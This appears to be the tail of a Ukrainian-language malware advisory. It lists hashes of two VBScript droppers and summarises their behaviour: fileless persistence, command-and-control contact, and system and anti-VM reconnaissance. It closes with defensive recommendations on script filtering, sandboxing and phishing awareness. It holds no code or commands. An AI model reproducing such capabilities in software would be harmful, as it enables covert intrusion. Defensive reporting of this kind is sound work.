SHA-256 Hash Identifier 9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
File Size 276 bytes
File Type ASCII text

File Name Retrive4324072840813515187.vbs
MD5 Hash Identifier A32C109297ED1CA155598CD295C26611
SHA-1 Hash Identifier DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256 Hash Identifier 45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
File Size 281 bytes
File Type ASCII text

File Name Retrive867820139510199033.vbs
MD5 Hash Identifier A32C109297ED1CA155598CD295C26611
SHA-1 Hash Identifier DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
SHA-256 Hash Identifier 45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
File Size 281 bytes
File Type ASCII text

Загалом:
– – – – – – –

1) Активація і закріплення в системі без створення нових .exe
2) Ініціює з’єднання із 2С
3) збирає інформацію про систему – наявність 0409 локалі (US), ім’я машини, антиВМ, дата і часовий пояс системи, збір інфи про АВ та брандмауєр,
4) Очікує команди із 2С

Рекомендації:
– – – – – – –
1) Фільтрація каналів доставки (web та email) на предмет макросів, скриптів та ін.
2) Заборона створення та запуску нових .jar та .vbs файлів
3) Застосування пісочниці
4) Співбесіди на тему фішингу, соц інженерії
5) Системи без JRE не вразливі до цього типу ШПЗ

Будьте уважні та обережні.

VR